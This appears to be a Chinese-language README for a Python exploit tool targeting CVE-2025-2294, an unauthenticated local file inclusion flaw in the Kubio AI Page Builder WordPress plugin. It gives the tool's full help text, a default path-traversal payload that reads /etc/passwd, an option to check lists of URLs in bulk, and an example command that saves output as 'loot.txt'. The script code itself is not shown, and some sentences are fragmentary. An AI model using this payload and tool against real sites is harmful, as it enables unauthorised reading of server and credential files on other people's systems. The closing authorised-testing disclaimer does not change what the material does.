CVE-2025-2294 影响 WordPress 的 Kubio AI 页面构建器 插件(版本 2.5.1 及以下)。该插件通过 thekubio_hybrid_theme_load_template 函数存在一个未经认证的本地文件包含 (LFI) 漏洞。
此漏洞允许攻击者在易受攻击的 WordPress 服务器上包含并执行任意文件,可能导致:
此 Python 脚本向易受攻击的 WordPress 站点发送精心构造的 HTTP GET 请求,以验证其是否存在 LFI 问题。
/etc/passwd)。usage: cve_2025_2294.py [-h] [--url URL] [--payload PAYLOAD] [--save SAVE]
[--lines LINES] [--timeout TIMEOUT] [--proxy PROXY]
[--check] [--list LIST]
CVE-2025-2294 LFI Exploit
optional arguments:
-h, --help show this help message and exit
--url URL Target URL (e.g., http://127.0.0.1:8080)
--payload PAYLOAD
LFI payload path (default: ../../../../../../../../etc/passwd)
--save SAVE Save full response to file (optional)
--lines LINES Number of preview lines (default: 10)
--timeout TIMEOUT
Request timeout in seconds (default: 10)
--proxy PROXY Proxy URL (e.g., http://127.0.0.1:8080)
--check Check vulnerability status only, no saving or preview
--list LIST Path to file with list of URLs to check one by one
python3 cve_2025_2294.py --url "http://192.168.1.10" --save loot.txt --lines 20 --payload /etc/passwd --timeout 10 --proxy "http://127.0.0.1:8080"
请求/响应:
本工具仅供授权的安全测试和研究使用。未经许可对系统进行未授权使用是违法且不道德的。